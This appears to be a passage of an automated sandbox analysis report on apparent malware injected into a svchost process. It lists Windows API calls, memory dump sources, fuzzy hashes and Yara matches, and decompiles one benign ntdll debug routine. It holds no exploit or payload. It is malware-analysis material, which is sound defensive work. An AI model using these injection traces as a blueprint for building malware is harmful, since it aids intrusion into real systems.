                                                                • Opcode Fuzzy Hash: 93454b5118d32c2772475a0d467401533ed4b10397fdd0caec935d0875b7de68
                                                                • Instruction Fuzzy Hash: 5D7160B19002186ADB15DB64CCC5FEBB3BDEF58304F044D9DE61997141EB70AB859F90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02C352A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID: @J7<
                                                                • API String ID: 2538663250-2016760708
                                                                • Opcode ID: 3d1fca1031a19b8c4cf05f817d4a6f3596f287479a13a5a2150cad578f943d90
                                                                • Instruction ID: 5634cd59c144aab5cf401683e5e4453e912e56b06c0613783afebd1cdd3b7c17
                                                                • Opcode Fuzzy Hash: 3d1fca1031a19b8c4cf05f817d4a6f3596f287479a13a5a2150cad578f943d90
                                                                • Instruction Fuzzy Hash: D23130B5A0060A9FDB01DFD8C8809EFB7B9FF88304B508959E519EB214D775EE458BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02C2B1C2
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                • Instruction ID: fc3317536917944633720d3655a7feaf3e5cddbc2ca0d4ace75694b2ed31c655
                                                                • Opcode Fuzzy Hash: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                • Instruction Fuzzy Hash: E4011EB5E4020DBBDB10DAA4DC41F9EB7799B54308F0049A5E908A7251FA71EB18DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(02C34282,?,?,02C34282,00000000,?), ref: 02C2E7FA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 2821e490078af64dddc46576982e325d3115ca939e97bbc79c9864f4bc645924
                                                                • Instruction ID: 7f068c605c91e01e6bd04192325e09d9e4684370f13fc93142a9f383dcfe1fea
                                                                • Opcode Fuzzy Hash: 2821e490078af64dddc46576982e325d3115ca939e97bbc79c9864f4bc645924
                                                                • Instruction Fuzzy Hash: 61F04C725093941BF7215A7CDC06BE07B548F86734F1C03D5EDD89E1C3DE66E10A8280
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C2E122,02C2E122,?,00000000,?,?), ref: 02C3CCD0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                • Instruction ID: 14f977b292b2a078a7fa4bb0a300e5995ed91df72bb75bd9548a20a63e1d4c9a
                                                                • Opcode Fuzzy Hash: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                • Instruction Fuzzy Hash: E1F03CB66042046FD724EF58DC85EA737ADEF85224F058899FD499B242D630E9108BE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,3B7578DC,00000000,00000000,02C2DDC2,?,?,?,3B7578DC,?), ref: 02C3B702
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: d0c4d64f50121e0897393bd7a0303ed796e39248fad6c521a83a594f8b96c834
                                                                • Instruction ID: 3727cfffb277970dab28719cf7e54b2b6837c57292f1015e4aa3e3140fe3409f
                                                                • Opcode Fuzzy Hash: d0c4d64f50121e0897393bd7a0303ed796e39248fad6c521a83a594f8b96c834
                                                                • Instruction Fuzzy Hash: 05F06D7378021436E32062A9AC02FE7B69DDB85B71F180426FB0CEB1C0D992F8018AF5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 02C3CB6D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                • Instruction ID: e2e85df68a776f280c8b5e6e04692738e26e0bc78628767c58e341963a42cb28
                                                                • Opcode Fuzzy Hash: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                • Instruction Fuzzy Hash: 84F0A9B42402006FCB19DF55CC48EEB3B6AEF893A0F208459F909A7282C230E911CAB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(02C34282,?,?,02C34282,00000000,?), ref: 02C2E7FA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 6301650eee3e5bbfbeb5c7e2d36964e88c11d59366aa81b71f9b94b6dde3b12e
                                                                • Instruction ID: f7951fe43a5232cd7127299d700330ae2bfb2c7bc857682791400f7c46368a6f
                                                                • Opcode Fuzzy Hash: 6301650eee3e5bbfbeb5c7e2d36964e88c11d59366aa81b71f9b94b6dde3b12e
                                                                • Instruction Fuzzy Hash: DDE0867565020827FB246AACDC49FA633588FC8728F184650FA9CEB2C2DE74F6498554
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 02C3CB6D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                • Instruction ID: c83c6dfb08f913ae7022c0241bca18315b31b7ecf63284448e4fe27796da0230
                                                                • Opcode Fuzzy Hash: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                • Instruction Fuzzy Hash: BEE0C0F00142C01FDB05FF6DD8808977FC9DF822143004D8EEC9457605C120D524DB71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 02C3CB6D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                • Instruction ID: 97501cb74c0d8a6b385b4050d952c0a5eec491f3308df6b2525ccc1606451304
                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                • Instruction Fuzzy Hash: 12E04FB12002046FCB14EF49DC44EA737ADEF88760F014454FD0957241C630F910CAF1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(02C36EE3,?,02C3768D,02C3768D,?,02C36EE3,00000000,?,?,?,?,00000000,00000000,00000002), ref: 02C3CB2D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                • Instruction ID: 411bc137dc2e1f002826edd8ceb59b4be812fad8a250c55907a62f5fde97bf02
                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                • Instruction Fuzzy Hash: 9DE046B2210208ABCB18EF89DC44EA737ADEF88764F018454FE096B241C630F910CAF1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C2E122,02C2E122,?,00000000,?,?), ref: 02C3CCD0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                • Instruction ID: 5f0d094f1a0d5c0fbd307a296988540e131911db7b1f734d98d8e2372075ec8f
                                                                • Opcode Fuzzy Hash: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                • Instruction Fuzzy Hash: 64E01AB16002046BC714EF49CC44EE737ADAF88664F054464BA0957242D634F8108AF5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02C28D8A,?), ref: 02C2E601
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: d4c4fb61fca30dc6897689a68a201e21eddd4c07fd029ba9ad0561dc71e4192a
                                                                • Instruction ID: a079a0f4d721be944a0a3fedcb7e392b53be2a63514c630311e335a74b9481c4
                                                                • Opcode Fuzzy Hash: d4c4fb61fca30dc6897689a68a201e21eddd4c07fd029ba9ad0561dc71e4192a
                                                                • Instruction Fuzzy Hash: 99D05EB5B843083BF610A6E5DC42F16328D5B44654F084054F94CEB2C2DD50F1048AA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: f31d2b3560269148310cb6b0f8aac996724a2a61cec07223d104c697343430a0
                                                                • Instruction ID: a8b037ff2925b72428fa6a7ed6a57886a4223a5ae68299e7c40ba7e8d301b969
                                                                • Opcode Fuzzy Hash: f31d2b3560269148310cb6b0f8aac996724a2a61cec07223d104c697343430a0
                                                                • Instruction Fuzzy Hash: 36B09B719115C5C5E611D770470871779047FD0741F16C055D1020641A4778C0D1F5B5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 664d14b7991fb4393cbe6991365a45428e1e595262dc4b6fa0eee6f73339683b
                                                                • Instruction ID: 317a5ae395d5c81e3f3b354d330302efc411c5464da70251b7866c18df643b77
                                                                • Opcode Fuzzy Hash: 664d14b7991fb4393cbe6991365a45428e1e595262dc4b6fa0eee6f73339683b
                                                                • Instruction Fuzzy Hash: 5FC08C23F982040EE121080D3C422F0EB289393235F4022E3EC48E72919283CC12019A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 53%
                                                                			E032BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                				void* _t7;
                                                                				intOrPtr _t9;
                                                                				intOrPtr _t10;
                                                                				intOrPtr* _t12;
                                                                				intOrPtr* _t13;
                                                                				intOrPtr _t14;
                                                                				intOrPtr* _t15;
                                                                
                                                                				_t13 = __edx;
                                                                				_push(_a4);
                                                                				_t14 =  *[fs:0x18];
                                                                				_t15 = _t12;
                                                                				_t7 = E0326CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                				_push(_t13);
                                                                				E032B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                				_t9 =  *_t15;
                                                                				if(_t9 == 0xffffffff) {
                                                                					_t10 = 0;
                                                                				} else {
                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                				}
                                                                				_push(_t10);
                                                                				_push(_t15);
                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                				return E032B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                			}











                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032BFDFA
                                                                Strings
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032BFE2B
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032BFE01
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                • API String ID: 885266447-3903918235
                                                                • Opcode ID: 8e6136df9fff70bde611577223e7be9da7509c9bd9d084de34d69fea30fcdd8f
                                                                • Instruction ID: ff46c8ceedb32cb9d1a6187084d767e8c1908f94253325893b466e694481ec5a
                                                                • Opcode Fuzzy Hash: 8e6136df9fff70bde611577223e7be9da7509c9bd9d084de34d69fea30fcdd8f
                                                                • Instruction Fuzzy Hash: E2F02236210201BFD6209A45CD02F63BB6AEB41770F240214F6684A5D1DAA2B8B092E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%